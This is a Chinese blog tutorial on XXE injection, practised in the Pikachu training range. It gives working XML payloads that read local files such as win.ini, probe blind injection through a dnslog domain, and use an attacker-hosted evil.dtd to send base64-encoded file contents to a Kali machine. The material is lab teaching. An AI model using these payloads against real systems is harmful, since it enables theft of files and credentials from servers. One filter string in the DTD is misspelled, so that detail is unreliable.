XXE漏洞原理和pikachu靶场实验

2024-03-16 22:12

本文主要是介绍XXE漏洞原理和pikachu靶场实验,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

1、XXE漏洞原理

XXE全称:XML External Entity Injection,XML外部实体注入。XXE漏洞主要是由于危险的外部实体引用和未对外部实体进行敏感字符的过滤,从而造成命令执行、目录遍历等。攻击者通过构造恶意的外部实体,当解析器解析包含“恶意”外部实体的XML类型文件,就会导致XXE攻击。

摘自百度百科

XML全称:Extensible Markup Language,可扩展标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

2、XXE的危害

1、导致可加载恶意外部文件、读取任意未授权文件,

2、恶意消耗内存进行DOS攻击,

3、探测内网信息,比如检测服务、内网端口扫描、攻击内网网站等,

4、命令执行、目录遍历等,

5、由于有些XML解析库支持列目录,攻击者通过列目录、读文件,获取账号密码后进一步攻击,比如读取tomcat-users.xml得到账号密码后登录tomcat的manager部署webshell。

3、XML分类

XXE的攻击方式分为两种:显示攻击和盲攻击。

**显示攻击: **攻击者可通过正常的回显将外部实体的内容读取出来;

盲攻击: 不显示外部实体的内容,可利用参数实体将本地文件内容读出来,作为URL参数向它指定服务器发起请求,然后在它指定服务器的日志中读取文件的内容。

4、pikachu靶场实验

4.0、环境准备

靶场环境搭建详参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》

4.1、普通实体

把这些xml代码放到文本框提交

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe "你今天真好看">
]>
<foo>&xxe;</foo>

提交结果

在这里插入图片描述

4.2、外部引用

把这些xml代码放到文本框提交

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/windows/win.ini">
]>
<foo>&xxe;</foo>

提交结果

在这里插入图片描述

4.3、盲注-利用dnslog

当没有回显提示信息时,可利用dnslog判断是否存在xxe漏洞。使用外部引用,在路径填写dnslog路径,然后在dnslog网站查看。

访问:https://dnslog.org/,点击Get Sub Domain按钮获取子域名放到xml代码

在这里插入图片描述

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://108c09f2.dnslog.store">
]>
<foo>&xxe;</foo>

提交后到https://dnslog.org/,点击Get Results查看注入结果,表示xxe注入成功

在这里插入图片描述

4.5、借助kali模拟攻击
4.5.0、前置说明

针对没有回显的,需要VPS(Virtual Private Server,虚拟专用服务器,简称VPS),这里使用kali模拟。

环境说明

攻击机kali(虚拟机):192.168.242.4
靶机win7(虚拟机):192.168.242.6
4.5.1 、kali开启http服务

使用python快速开启http服务,注入先使用sudo su命令切换到管理员权限。

python3 -m http.server 80

在这里插入图片描述

4.5.2、kali创建evil.dtd

先在自己电脑本机创建evil.dtd,内容如下,

<!ENTITY % file SYSTEM "php://fiter/reader=convert.base64-encode/resource=file:///xxe.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.242.4?c=%file;'>">

创建一个文本xxe.txt,里面写123或自己任意写内容,和evil.dtd一起复制到kali的系统目录下:/home/kali

在这里插入图片描述

4.5.3、win7系统测试

可以直接在浏览器访问:http://192.168.242.4/evil.dtd,会看到目录展示和下载evil.dtd。

在这里插入图片描述

pikachu使用下面的xml提交,

<!DOCTYPE convert[<!ENTITY % remote SYSTEM "http://192.168.242.4/evil.dtd">%remote;%int;%send;
]>
4.5.4、kali看数据读取成功

在这里插入图片描述

5、资料获取

如果需要kali和win7系统虚拟机,进行实验的话(如果在渗透测试实战已有下载过,不需要再下载了),请关注我的公众号:大象只为你,后台回复:虚拟机。文件有些大下载耗时会比较久。

6、下期内容预告

《跟我学网安知识》系列文章截止目前已分享49篇啦,也接近尾声了,还有内网一些知识,由于我还未整理成笔记,下周三要参加CISP考试和自己其他一些事情要忙,本周先暂时分享XXE这一篇。预计在下周六/日分享内网的知识点,内网部分可能大约2~3篇左右就结束了。

后面还会再分享技术文章,可能是Java专题系列,或自己挖漏洞的分享,来倒逼自己产出和学习,敬请关注我的公众号:大象只为你。

这篇关于XXE漏洞原理和pikachu靶场实验的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/816873

相关文章

Java编译生成多个.class文件的原理和作用

《Java编译生成多个.class文件的原理和作用》作为一名经验丰富的开发者,在Java项目中执行编译后,可能会发现一个.java源文件有时会产生多个.class文件,从技术实现层面详细剖析这一现象... 目录一、内部类机制与.class文件生成成员内部类(常规内部类)局部内部类(方法内部类)匿名内部类二、

Python中随机休眠技术原理与应用详解

《Python中随机休眠技术原理与应用详解》在编程中,让程序暂停执行特定时间是常见需求,当需要引入不确定性时,随机休眠就成为关键技巧,下面我们就来看看Python中随机休眠技术的具体实现与应用吧... 目录引言一、实现原理与基础方法1.1 核心函数解析1.2 基础实现模板1.3 整数版实现二、典型应用场景2

Java的IO模型、Netty原理解析

《Java的IO模型、Netty原理解析》Java的I/O是以流的方式进行数据输入输出的,Java的类库涉及很多领域的IO内容:标准的输入输出,文件的操作、网络上的数据传输流、字符串流、对象流等,这篇... 目录1.什么是IO2.同步与异步、阻塞与非阻塞3.三种IO模型BIO(blocking I/O)NI

JAVA封装多线程实现的方式及原理

《JAVA封装多线程实现的方式及原理》:本文主要介绍Java中封装多线程的原理和常见方式,通过封装可以简化多线程的使用,提高安全性,并增强代码的可维护性和可扩展性,需要的朋友可以参考下... 目录前言一、封装的目标二、常见的封装方式及原理总结前言在 Java 中,封装多线程的原理主要围绕着将多线程相关的操

kotlin中的模块化结构组件及工作原理

《kotlin中的模块化结构组件及工作原理》本文介绍了Kotlin中模块化结构组件,包括ViewModel、LiveData、Room和Navigation的工作原理和基础使用,本文通过实例代码给大家... 目录ViewModel 工作原理LiveData 工作原理Room 工作原理Navigation 工

Java的volatile和sychronized底层实现原理解析

《Java的volatile和sychronized底层实现原理解析》文章详细介绍了Java中的synchronized和volatile关键字的底层实现原理,包括字节码层面、JVM层面的实现细节,以... 目录1. 概览2. Synchronized2.1 字节码层面2.2 JVM层面2.2.1 ente

MySQL的隐式锁(Implicit Lock)原理实现

《MySQL的隐式锁(ImplicitLock)原理实现》MySQL的InnoDB存储引擎中隐式锁是一种自动管理的锁,用于保证事务在行级别操作时的数据一致性和安全性,本文主要介绍了MySQL的隐式锁... 目录1. 背景:什么是隐式锁?2. 隐式锁的工作原理3. 隐式锁的类型4. 隐式锁的实现与源代码分析4

MySQL中Next-Key Lock底层原理实现

《MySQL中Next-KeyLock底层原理实现》Next-KeyLock是MySQLInnoDB存储引擎中的一种锁机制,结合记录锁和间隙锁,用于高效并发控制并避免幻读,本文主要介绍了MySQL中... 目录一、Next-Key Lock 的定义与作用二、底层原理三、源代码解析四、总结Next-Key L

Spring Cloud Hystrix原理与注意事项小结

《SpringCloudHystrix原理与注意事项小结》本文介绍了Hystrix的基本概念、工作原理以及其在实际开发中的应用方式,通过对Hystrix的深入学习,开发者可以在分布式系统中实现精细... 目录一、Spring Cloud Hystrix概述和设计目标(一)Spring Cloud Hystr

MySQL中的MVCC底层原理解读

《MySQL中的MVCC底层原理解读》本文详细介绍了MySQL中的多版本并发控制(MVCC)机制,包括版本链、ReadView以及在不同事务隔离级别下MVCC的工作原理,通过一个具体的示例演示了在可重... 目录简介ReadView版本链演示过程总结简介MVCC(Multi-Version Concurr